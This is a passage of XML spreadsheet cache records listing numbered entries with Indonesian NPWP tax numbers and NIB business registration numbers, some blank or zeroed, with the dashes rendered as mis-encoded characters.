    <s v="01‚Äì621‚Äì291‚Äì2‚Äì624‚Äì001"/>
  </r>
  <r>
    <x v="846"/>
    <s v="npwp"/>
    <s v="01‚Äì303‚Äì285‚Äì9‚Äì075‚Äì000"/>
  </r>
  <r>
    <x v="846"/>
    <s v="nib"/>
    <n v="9120204560322"/>
  </r>
  <r>
    <x v="847"/>
    <s v="npwp"/>
    <s v="31‚Äì224‚Äì943‚Äì6‚Äì405‚Äì000"/>
  </r>
  <r>
    <x v="847"/>
    <s v="nib"/>
    <n v="8120013141005"/>
  </r>
  <r>
    <x v="848"/>
    <s v="npwp"/>
    <s v="07.356.884.2‚Äì311.000"/>
  </r>
  <r>
    <x v="849"/>
    <s v="npwp"/>
    <s v="16‚Äì707‚Äì723‚Äì9‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="850"/>
    <s v="npwp"/>
    <s v="84‚Äì352‚Äì771‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="851"/>
    <s v="npwp"/>
    <s v="01‚Äì898‚Äì344‚Äì5‚Äì905‚Äì000"/>
  </r>
  <r>
    <x v="851"/>
    <s v="nib"/>
    <n v="8120015290218"/>
  </r>
  <r>
    <x v="852"/>
    <s v="npwp"/>
    <s v="01‚Äì696‚Äì446‚Äì2‚Äì903‚Äì001"/>
  </r>
  <r>
    <x v="853"/>
    <s v="npwp"/>
    <s v="01‚Äì984‚Äì622‚Äì9‚Äì903‚Äì001"/>
  </r>
  <r>
    <x v="853"/>
    <s v="nib"/>
    <n v="8120001830145"/>
  </r>
  <r>
    <x v="854"/>
    <s v="npwp"/>
    <s v="01‚Äì110‚Äì029‚Äì4‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="854"/>
    <s v="nib"/>
    <n v="8120214162693"/>
  </r>
  <r>
    <x v="855"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì051‚Äì000"/>
  </r>
  <r>
    <x v="856"/>
    <s v="npwp"/>
    <s v="72‚Äì975‚Äì134‚Äì7‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="857"/>
    <s v="npwp"/>
    <s v="66‚Äì331‚Äì872‚Äì3‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="858"/>
    <s v="npwp"/>
    <s v="01‚Äì718‚Äì590‚Äì1‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="858"/>
    <s v="nib"/>
    <n v="8120002941581"/>
  </r>
  <r>
    <x v="859"/>
    <s v="npwp"/>
    <s v="02‚Äì419‚Äì025‚Äì8‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="859"/>
    <s v="nib"/>
    <n v="9120105192189"/>
  </r>
  <r>
    <x v="860"/>
    <s v="npwp"/>
    <s v="02‚Äì938‚Äì305‚Äì6‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="860"/>
    <s v="nib"/>
    <n v="9120203171273"/>
  </r>
  <r>
    <x v="861"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="862"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="863"/>
    <s v="npwp"/>
    <s v="84‚Äì284‚Äì836‚Äì8‚Äì956‚Äì000"/>
  </r>
  <r>
    <x v="864"/>
    <s v="npwp"/>
    <s v="66‚Äì290‚Äì811‚Äì0‚Äì653‚Äì000"/>
  </r>
  <r>
    <x v="865"/>
    <s v="npwp"/>
    <s v="01‚Äì481‚Äì328‚Äì1‚Äì508‚Äì000"/>
  </r>
  <r>
    <x v="866"/>
    <s v="npwp"/>
    <s v="02‚Äì480‚Äì445‚Äì2‚Äì657‚Äì000"/>
  </r>
  <r>
    <x v="866"/>
    <s v="nib"/>
    <n v="8120216281732"/>
  </r>
  <r>
    <x v="867"/>
    <s v="npwp"/>
    <s v="01‚Äì925‚Äì358‚Äì2‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="868"/>
    <s v="npwp"/>
    <s v="02‚Äì030‚Äì514‚Äì0‚Äì125‚Äì000"/>
  </r>
  <r>
    <x v="868"/>
    <s v="nib"/>
    <n v="8120004870042"/>
  </r>
  <r>
    <x v="869"/>
    <s v="npwp"/>
    <s v="14‚Äì125‚Äì970‚Äì5‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="870"/>
    <s v="npwp"/>
    <s v="76‚Äì164‚Äì194‚Äì3‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="871"/>
    <s v="npwp"/>
    <s v="75‚Äì938‚Äì210‚Äì4‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="871"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="872"/>
    <s v="npwp"/>
    <s v="09‚Äì978‚Äì933‚Äì1‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="873"/>
    <s v="npwp"/>
    <s v="80‚Äì864‚Äì647‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="873"/>
    <s v="nib"/>
    <n v="8120203831444"/>
  </r>
  <r>
    <x v="874"/>
    <s v="npwp"/>
    <s v="07‚Äì089‚Äì653‚Äì5‚Äì809‚Äì000"/>
  </r>
  <r>
    <x v="875"/>
    <s v="npwp"/>
    <s v="82‚Äì744‚Äì711‚Äì4‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="875"/>
    <s v="nib"/>
    <n v="9120305121269"/>
  </r>
  <r>
    <x v="876"/>
    <s v="npwp"/>
    <s v="81‚Äì209‚Äì004‚Äì1‚Äì452‚Äì000"/>
  </r>
  <r>
    <x v="877"/>
    <s v="npwp"/>
    <s v="15‚Äì911‚Äì670‚Äì6‚Äì331‚Äì000"/>
  </r>
  <r>
    <x v="878"/>
    <s v="npwp"/>
    <s v="03‚Äì008‚Äì874‚Äì4‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="878"/>
    <s v="nib"/>
    <n v="9120307721856"/>
  </r>
  <r>
    <x v="879"/>
    <s v="npwp"/>
    <s v="07‚Äì452‚Äì154‚Äì3‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="879"/>
    <s v="nib"/>
    <n v="8120014133007"/>
  </r>
  <r>
    <x v="880"/>
    <s v="npwp"/>
    <s v="02‚Äì217‚Äì767‚Äì9‚Äì903‚Äì000"/>
  </r>
  <r>
    <x v="881"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì051‚Äì000"/>
  </r>
  <r>
    <x v="881"/>
    <s v="nib"/>
    <n v="8120003713913"/>
  </r>
  <r>
    <x v="882"/>
    <s v="npwp"/>
    <s v="66‚Äì260‚Äì612‚Äì8‚Äì807‚Äì000"/>
  </r>
  <r>
    <x v="882"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="883"/>
    <s v="npwp"/>
    <s v="02‚Äì930‚Äì311‚Äì2‚Äì022‚Äì000"/>
  </r>
  <r>
    <x v="884"/>
    <s v="npwp"/>
    <s v="01‚Äì462‚Äì184‚Äì1‚Äì308‚Äì000"/>
  </r>
  <r>
    <x v="885"/>
    <s v="npwp"/>
    <s v="31‚Äì656‚Äì557‚Äì1‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="886"/>
    <s v="npwp"/>
    <s v="02‚Äì192‚Äì987‚Äì2‚Äì405‚Äì000"/>
  </r>
  <r>
    <x v="887"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="888"/>
    <s v="npwp"/>
    <s v="02‚Äì932‚Äì771‚Äì5‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="889"/>
    <s v="npwp"/>
    <s v="02‚Äì101‚Äì374‚Äì3‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="890"/>
    <s v="npwp"/>
    <s v="16‚Äì444‚Äì588‚Äì4‚Äì212‚Äì000"/>
  </r>
  <r>
    <x v="891"/>
    <s v="npwp"/>
    <s v="02‚Äì968‚Äì861‚Äì1‚Äì212‚Äì000"/>
  </r>
  <r>
    <x v="892"/>
    <s v="npwp"/>
    <s v="71‚Äì884‚Äì418‚Äì6‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="893"/>
    <s v="npwp"/>
    <s v="82‚Äì980‚Äì042‚Äì6‚Äì334‚Äì000"/>
  </r>
  <r>
    <x v="894"/>
    <s v="npwp"/>
    <s v="00‚Äì000‚Äì000‚Äì0‚Äì000‚Äì000"/>
  </r>
  <r>
    <x v="895"/>
    <s v="npwp"/>
    <s v="00‚Äì000‚Äì000‚Äì0‚Äì000‚Äì000"/>
  </r>
  <r>
    <x v="896"/>
    <s v="npwp"/>
    <s v="74‚Äì476‚Äì592‚Äì6‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="897"/>
    <s v="npwp"/>
    <s v="76‚Äì403‚Äì310‚Äì6‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="898"/>
    <s v="npwp"/>
    <s v="83‚Äì678‚Äì076‚Äì7‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="899"/>
    <s v="npwp"/>
    <s v="03‚Äì341‚Äì672‚Äì6‚Äì807‚Äì000"/>
  </r>
  <r>
    <x v="900"/>
    <s v="npwp"/>
    <s v="84‚Äì282‚Äì160‚Äì5‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="901"/>
    <s v="npwp"/>
    <s v="46‚Äì025‚Äì365‚Äì1‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="902"/>
    <s v="npwp"/>
    <s v="70‚Äì963‚Äì590‚Äì8‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="903"/>
    <s v="npwp"/>
    <s v="73‚Äì741‚Äì468‚Äì0‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="903"/>
    <s v="nib"/>
    <n v="8120213292911"/>
  </r>
  <r>
    <x v="904"/>
    <s v="npwp"/>
    <s v="75‚Äì835‚Äì763‚Äì6‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="904"/>
    <s v="nib"/>
    <n v="8120015272343"/>
  </r>
  <r>
    <x v="905"/>
    <s v="npwp"/>
    <s v="01‚Äì133‚Äì181‚Äì6‚Äì631‚Äì000"/>
  </r>
  <r>
    <x v="905"/>
    <s v="nib"/>
    <n v="8120006962667"/>
  </r>
  <r>
    <x v="906"/>
    <s v="npwp"/>
    <s v="14‚Äì126‚Äì376‚Äì4‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="907"/>
    <s v="npwp"/>
    <s v="84‚Äì166‚Äì380‚Äì0‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="908"/>
    <s v="npwp"/>
    <s v="02‚Äì000‚Äì993‚Äì2‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="909"/>
    <s v="npwp"/>
    <s v="81‚Äì736‚Äì173‚Äì6‚Äì811‚Äì000"/>
  </r>
  <r>
    <x v="910"/>
    <s v="npwp"/>
    <s v="83‚Äì528‚Äì618‚Äì8‚Äì331‚Äì000"/>
  </r>
  <r>
    <x v="911"/>
    <s v="npwp"/>
    <s v="73‚Äì744‚Äì427‚Äì3‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="911"/>
    <s v="nib"/>
    <n v="8120211190575"/>
  </r>
  <r>
    <x v="912"/>
    <s v="npwp"/>
    <s v="02‚Äì009‚Äì744‚Äì0‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="912"/>
    <s v="nib"/>
    <n v="8120001920549"/>
  </r>
  <r>
    <x v="913"/>
    <s v="npwp"/>
    <s v="02‚Äì879‚Äì171‚Äì3‚Äì625‚Äì000"/>
  </r>
  <r>
    <x v="913"/>
    <s v="nib"/>
    <n v="9120300961596"/>
  </r>
  <r>
    <x v="914"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì645‚Äì001"/>
  </r>
  <r>
    <x v="914"/>
    <s v="nib"/>
    <n v="8120202990554"/>
  </r>
  <r>
    <x v="915"/>
    <s v="npwp"/>
    <n v="147006415214000"/>
  </r>
  <r>
    <x v="916"/>
    <s v="npwp"/>
    <s v="07‚Äì846‚Äì566‚Äì3‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="917"/>
    <s v="npwp"/>
    <s v="66‚Äì710‚Äì103‚Äì4‚Äì126‚Äì000"/>
  </r>
  <r>
    <x v="917"/>
    <s v="nib"/>
    <n v="8120105800474"/>
  </r>
  <r>
    <x v="918"/>
    <s v="npwp"/>
    <s v="02‚Äì889‚Äì248‚Äì7‚Äì126‚Äì000"/>
  </r>
  <r>
    <x v="918"/>
    <s v="nib"/>
    <n v="8120200840676"/>
  </r>
  <r>
    <x v="919"/>
    <s v="npwp"/>
    <s v="24‚Äì020‚Äì737‚Äì3‚Äì629‚Äì000"/>
  </r>
  <r>
    <x v="920"/>
    <s v="npwp"/>
    <s v="01‚Äì672‚Äì001‚Äì3‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="920"/>
    <s v="nib"/>
    <n v="8120008842543"/>
  </r>
  <r>
    <x v="921"/>
    <s v="npwp"/>
    <s v="31‚Äì748‚Äì584‚Äì5‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="922"/>
    <s v="npwp"/>
    <s v="01‚Äì795‚Äì459‚Äì5‚Äì522‚Äì000"/>
  </r>
  <r>
    <x v="922"/>
    <s v="nib"/>
    <n v="9120002100144"/>
  </r>
  <r>
    <x v="923"/>
    <s v="npwp"/>
    <s v="14‚Äì027‚Äì812‚Äì8‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="924"/>
    <s v="npwp"/>
    <s v="01‚Äì070‚Äì707‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="924"/>
    <s v="nib"/>
    <n v="8120219101125"/>
  </r>
  <r>
    <x v="925"/>
    <s v="npwp"/>
    <s v="85‚Äì272‚Äì328‚Äì7‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="926"/>
    <s v="npwp"/>
    <s v="01‚Äì475‚Äì610‚Äì0‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="927"/>
    <s v="npwp"/>
    <s v="06‚Äì888‚Äì443‚Äì6‚Äì603‚Äì000"/>
  </r>
  <r>
    <x v="927"/>
    <s v="nib"/>
    <n v="9120108163212"/>
  </r>
  <r>
    <x v="928"/>
    <s v="npwp"/>
    <s v="59‚Äì840‚Äì332‚Äì7‚Äì608‚Äì000"/>
  </r>
  <r>
    <x v="929"/>
    <s v="npwp"/>
    <s v="76‚Äì403‚Äì310‚Äì6‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="929"/>
    <s v="nib"/>
    <n v="8120006851833"/>
  </r>
  <r>
    <x v="930"/>
    <s v="npwp"/>
    <s v="45‚Äì467‚Äì505‚Äì9‚Äì504‚Äì000"/>
  </r>
  <r>
    <x v="931"/>
    <s v="npwp"/>
    <s v="01‚Äì870‚Äì966‚Äì7‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="932"/>
    <s v="npwp"/>
    <s v="24‚Äì272‚Äì152‚Äì0‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="932"/>
    <s v="nib"/>
    <n v="8120008723616"/>
  </r>
  <r>
    <x v="933"/>
    <s v="npwp"/>
    <s v="73‚Äì303‚Äì843‚Äì3‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="933"/>
    <s v="nib"/>
    <n v="9120200651418"/>
  </r>
  <r>
    <x v="934"/>
    <s v="npwp"/>
    <s v="85‚Äì020‚Äì656‚Äì6‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="935"/>
    <s v="npwp"/>
    <s v="21‚Äì117‚Äì784‚Äì5‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="936"/>
    <s v="npwp"/>
    <s v="02‚Äì529‚Äì608‚Äì8‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="937"/>
    <s v="npwp"/>
    <s v="81‚Äì035‚Äì062‚Äì9‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="938"/>
    <s v="npwp"/>
    <s v="82.714.797.6-801.000"/>
  </r>
  <r>
    <x v="939"/>
    <s v="npwp"/>
    <s v="02‚Äì154‚Äì574‚Äì4‚Äì511‚Äì000"/>
  </r>
  <r>
    <x v="940"/>
    <s v="npwp"/>
    <s v="66‚Äì710‚Äì103‚Äì4‚Äì126‚Äì000"/>
  </r>
  <r>
    <x v="941"/>
    <s v="npwp"/>
    <s v="76‚Äì103‚Äì644‚Äì1‚Äì913‚Äì000"/>
  </r>
  <r>
    <x v="942"/>
    <s v="npwp"/>
    <s v="81‚Äì240‚Äì096‚Äì8‚Äì914‚Äì000"/>
  </r>
  <r>
    <x v="942"/>
    <s v="nib"/>
    <n v="8120005892591"/>
  </r>
  <r>
    <x v="943"/>
    <s v="npwp"/>
    <s v="01‚Äì002‚Äì749‚Äì8‚Äì811‚Äì001"/>
  </r>
  <r>
    <x v="944"/>
    <s v="npwp"/>
    <s v="01‚Äì070‚Äì613‚Äì3‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="945"/>
    <s v="npwp"/>
    <s v="08‚Äì820‚Äì322‚Äì9‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="946"/>
    <s v="npwp"/>
    <s v="77‚Äì318‚Äì653‚Äì1‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="947"/>
    <s v="npwp"/>
    <s v="59‚Äì840‚Äì332‚Äì7‚Äì608‚Äì000"/>
  </r>
  <r>
    <x v="948"/>
    <s v="npwp"/>
    <s v="01‚Äì517‚Äì118‚Äì4‚Äì656‚Äì001"/>
  </r>
  <r>
    <x v="949"/>
    <s v="npwp"/>
    <s v="15‚Äì946‚Äì167‚Äì2‚Äì204‚Äì000"/>
  </r>
  <r>
    <x v="949"/>
    <s v="nib"/>
    <n v="8120217191169"/>
  </r>
  <r>
    <x v="950"/>
    <s v="npwp"/>
    <s v="59‚Äì840‚Äì330‚Äì1‚Äì608‚Äì000"/>
  </r>
  <r>
    <x v="951"/>
    <s v="npwp"/>
    <s v="31‚Äì572‚Äì608‚Äì3‚Äì416‚Äì000"/>
  </r>
  <r>
    <x v="952"/>
    <s v="npwp"/>
    <s v="64‚Äì204‚Äì737‚Äì7‚Äì713‚Äì000"/>
  </r>
  <r>
    <x v="953"/>
    <s v="npwp"/>
    <s v="01‚Äì606‚Äì198‚Äì8‚Äì415‚Äì000"/>
  </r>
  <r>
    <x v="954"/>
    <s v="npwp"/>
    <s v="84.744.966.7-823.000"/>
  </r>
  <r>
    <x v="955"/>
    <s v="npwp"/>
    <s v="25‚Äì169‚Äì805‚Äì6‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="955"/>
    <s v="nib"/>
    <n v="8120203870065"/>
  </r>
  <r>
    <x v="956"/>
    <s v="npwp"/>
    <s v="31‚Äì505‚Äì295‚Äì1‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="956"/>
    <s v="nib"/>
    <s v="(NIB) 8120004900484"/>
  </r>
  <r>
    <x v="957"/>
    <s v="npwp"/>
    <s v="83‚Äì698‚Äì305‚Äì6‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="957"/>
    <s v="nib"/>
    <n v="9120403801545"/>
  </r>
  <r>
    <x v="958"/>
    <s v="npwp"/>
    <s v="71‚Äì179‚Äì621‚Äì9‚Äì518‚Äì000"/>
  </r>
  <r>
    <x v="958"/>
    <s v="nib"/>
    <n v="8120003751693"/>
  </r>
  <r>
    <x v="959"/>
    <s v="npwp"/>
    <s v="02‚Äì817‚Äì473‚Äì8‚Äì617‚Äì001"/>
  </r>
  <r>
    <x v="960"/>
    <s v="npwp"/>
    <s v="24‚Äì143‚Äì766‚Äì4‚Äì450‚Äì500"/>
  </r>
  <r>
    <x v="961"/>
    <s v="npwp"/>
    <s v="02‚Äì430‚Äì461‚Äì0‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="961"/>
    <s v="nib"/>
    <n v="8120002881244"/>
  </r>
  <r>
    <x v="962"/>
    <s v="npwp"/>
    <s v="31‚Äì588‚Äì384‚Äì3‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="963"/>
    <s v="npwp"/>
    <s v="03‚Äì262‚Äì399‚Äì3‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="964"/>
    <s v="npwp"/>
    <s v="75‚Äì571‚Äì839‚Äì2‚Äì941‚Äì001"/>
  </r>
  <r>
    <x v="965"/>
    <s v="npwp"/>
    <s v="24‚Äì933‚Äì775‚Äì9‚Äì702‚Äì000"/>
  </r>
  <r>
    <x v="965"/>
    <s v="nib"/>
    <n v="9120004451723"/>
  </r>
  <r>
    <x v="966"/>
    <s v="npwp"/>
    <s v="76‚Äì420‚Äì689‚Äì2‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="967"/>
    <s v="npwp"/>
    <s v="83.461.656.7-515.000"/>
  </r>
  <r>
    <x v="968"/>
    <s v="npwp"/>
    <s v="31‚Äì601‚Äì399‚Äì4‚Äì807‚Äì000"/>
  </r>
  <r>
    <x v="969"/>
    <s v="npwp"/>
    <s v="76‚Äì937‚Äì341‚Äì6‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="969"/>
    <s v="nib"/>
    <n v="8120016230314"/>
  </r>
  <r>
    <x v="970"/>
    <s v="npwp"/>
    <s v="66‚Äì209‚Äì235‚Äì2‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="970"/>
    <s v="nib"/>
    <n v="8120202812835"/>
  </r>
  <r>
    <x v="971"/>
    <s v="npwp"/>
    <s v="72‚Äì892‚Äì260‚Äì0‚Äì642‚Äì001"/>
  </r>
  <r>
    <x v="971"/>
    <s v="nib"/>
    <n v="8120000872929"/>
  </r>
  <r>
    <x v="972"/>
    <s v="npwp"/>
    <s v="01‚Äì610‚Äì642‚Äì9‚Äì056‚Äì000"/>
  </r>
  <r>
    <x v="973"/>
    <s v="npwp"/>
    <s v="03‚Äì052‚Äì434‚Äì2‚Äì645‚Äì001"/>
  </r>
  <r>
    <x v="974"/>
    <s v="npwp"/>
    <s v="21‚Äì123‚Äì389‚Äì5‚Äì426‚Äì000"/>
  </r>
  <r>
    <x v="975"/>
    <s v="npwp"/>
    <s v="02‚Äì831‚Äì013‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="976"/>
    <s v="npwp"/>
    <s v="31‚Äì213‚Äì859‚Äì7‚Äì501‚Äì000"/>
  </r>
  <r>
    <x v="977"/>
    <s v="npwp"/>
    <s v="01‚Äì438‚Äì688‚Äì2‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="978"/>
    <s v="npwp"/>
    <s v="83‚Äì038‚Äì566‚Äì2‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="978"/>
    <s v="nib"/>
    <n v="9120104462726"/>
  </r>
  <r>
    <x v="979"/>
    <s v="npwp"/>
    <s v="02‚Äì759‚Äì483‚Äì7‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="979"/>
    <s v="nib"/>
    <n v="8120005842255"/>
  </r>
  <r>
    <x v="980"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="980"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="981"/>
    <s v="npwp"/>
    <s v="02‚Äì759‚Äì339‚Äì5‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="981"/>
    <s v="nib"/>
    <n v="812010373915"/>
  </r>
  <r>
    <x v="982"/>
    <s v="npwp"/>
    <s v="06‚Äì053‚Äì795‚Äì8‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="982"/>
    <s v="nib"/>
    <n v="8120200872086"/>
  </r>
  <r>
    <x v="983"/>
    <s v="npwp"/>
    <s v="24‚Äì495‚Äì515‚Äì9‚Äì115‚Äì000"/>
  </r>
  <r>
    <x v="984"/>
    <s v="npwp"/>
    <s v="02.032.698.9-812.000"/>
  </r>
  <r>
    <x v="985"/>
    <s v="npwp"/>
    <s v="01‚Äì454‚Äì019‚Äì9‚Äì654‚Äì002"/>
  </r>
  <r>
    <x v="986"/>
    <s v="npwp"/>
    <s v="03‚Äì218‚Äì352‚Äì5‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="987"/>
    <s v="npwp"/>
    <s v="84‚Äì786‚Äì463‚Äì4‚Äì113‚Äì000"/>
  </r>
  <r>
    <x v="987"/>
    <s v="nib"/>
    <n v="8120008860734"/>
  </r>
  <r>
    <x v="988"/>
    <s v="npwp"/>
    <s v="01‚Äì870‚Äì008‚Äì8‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="989"/>
    <s v="npwp"/>
    <s v="01‚Äì548‚Äì145‚Äì0‚Äì025‚Äì000"/>
  </r>
  <r>
    <x v="990"/>
    <s v="npwp"/>
    <s v="21‚Äì039‚Äì306‚Äì2‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="990"/>
    <s v="nib"/>
    <n v="9120107102448"/>
  </r>
  <r>
    <x v="991"/>
    <s v="npwp"/>
    <s v="84‚Äì756‚Äì742‚Äì7‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="991"/>
    <s v="nib"/>
    <n v="9120000402768"/>
  </r>
  <r>
    <x v="992"/>
    <s v="npwp"/>
    <s v="06‚Äì405‚Äì373‚Äì9‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="992"/>
    <s v="nib"/>
    <n v="8120109970931"/>
  </r>
  <r>
    <x v="993"/>
    <s v="npwp"/>
    <s v="44‚Äì726‚Äì430‚Äì0‚Äì434‚Äì000"/>
  </r>
  <r>
    <x v="994"/>
    <s v="npwp"/>
    <s v="47‚Äì181‚Äì690‚Äì0‚Äì403‚Äì000"/>
  </r>
  <r>
    <x v="995"/>
    <s v="npwp"/>
    <s v="02‚Äì451‚Äì137‚Äì0‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="996"/>
    <s v="npwp"/>
    <s v="02‚Äì490‚Äì284‚Äì3‚Äì304‚Äì000"/>
  </r>
  <r>
    <x v="996"/>
    <s v="nib"/>
    <n v="8120215111256"/>
  </r>
  <r>
    <x v="997"/>
    <s v="npwp"/>
    <s v="75‚Äì357‚Äì242‚Äì9‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="998"/>
    <s v="npwp"/>
    <s v="83.171.786-734.000"/>
  </r>
  <r>
    <x v="999"/>
    <s v="npwp"/>
    <s v="02‚Äì523‚Äì050‚Äì9‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1000"/>
    <s v="npwp"/>
    <s v="01‚Äì991‚Äì532‚Äì1‚Äì325‚Äì000"/>
  </r>
  <r>
    <x v="1001"/>
    <s v="npwp"/>
    <s v="01‚Äì438‚Äì456‚Äì4‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="1001"/>
    <s v="nib"/>
    <n v="8120210021427"/>
  </r>
  <r>
    <x v="1002"/>
    <s v="npwp"/>
    <s v="01‚Äì830‚Äì006‚Äì1‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1003"/>
    <s v="npwp"/>
    <s v="84‚Äì569‚Äì144‚Äì3‚Äì027‚Äì000"/>
  </r>
  <r>
    <x v="1003"/>
    <s v="nib"/>
    <n v="8120109883912"/>
  </r>
  <r>
    <x v="1004"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1004"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1005"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1005"/>
    <s v="nib"/>
    <n v="8120316002347"/>
  </r>
  <r>
    <x v="1006"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì797‚Äì5‚Äì114‚Äì001"/>
  </r>
  <r>
    <x v="1007"/>
    <s v="npwp"/>
    <s v="01‚Äì821‚Äì663‚Äì0‚Äì651‚Äì000"/>
  </r>
  <r>
    <x v="1008"/>
    <s v="npwp"/>
    <s v="02‚Äì268‚Äì035‚Äì9‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1008"/>
    <s v="nib"/>
    <n v="8120111021183"/>
  </r>
  <r>
    <x v="1009"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1010"/>
    <s v="npwp"/>
    <s v="21‚Äì151‚Äì107‚Äì6‚Äì432‚Äì000"/>
  </r>
  <r>
    <x v="1010"/>
    <s v="nib"/>
    <n v="8120004981734"/>
  </r>
  <r>
    <x v="1011"/>
    <s v="npwp"/>
    <s v="31‚Äì790‚Äì673‚Äì3‚Äì071‚Äì000"/>
  </r>
  <r>
    <x v="1011"/>
    <s v="nib"/>
    <n v="8120003910574"/>
  </r>
  <r>
    <x v="1012"/>
    <s v="npwp"/>
    <s v="85‚Äì334‚Äì413‚Äì3‚Äì447‚Äì000"/>
  </r>
  <r>
    <x v="1013"/>
    <s v="npwp"/>
    <s v="14‚Äì325‚Äì791‚Äì3‚Äì913‚Äì000"/>
  </r>
  <r>
    <x v="1014"/>
    <s v="npwp"/>
    <s v="14‚Äì029‚Äì211‚Äì1‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1015"/>
    <s v="npwp"/>
    <s v="03‚Äì006‚Äì175‚Äì8‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1016"/>
    <s v="npwp"/>
    <s v="14‚Äì675‚Äì424‚Äì7‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1016"/>
    <s v="nib"/>
    <n v="8120114221245"/>
  </r>
  <r>
    <x v="1017"/>
    <s v="npwp"/>
    <s v="59‚Äì941‚Äì671‚Äì6‚Äì802‚Äì000"/>
  </r>
  <r>
    <x v="1017"/>
    <s v="nib"/>
    <n v="9120101751408"/>
  </r>
  <r>
    <x v="1018"/>
    <s v="npwp"/>
    <s v="55‚Äì403‚Äì333‚Äì2‚Äì404‚Äì000"/>
  </r>
  <r>
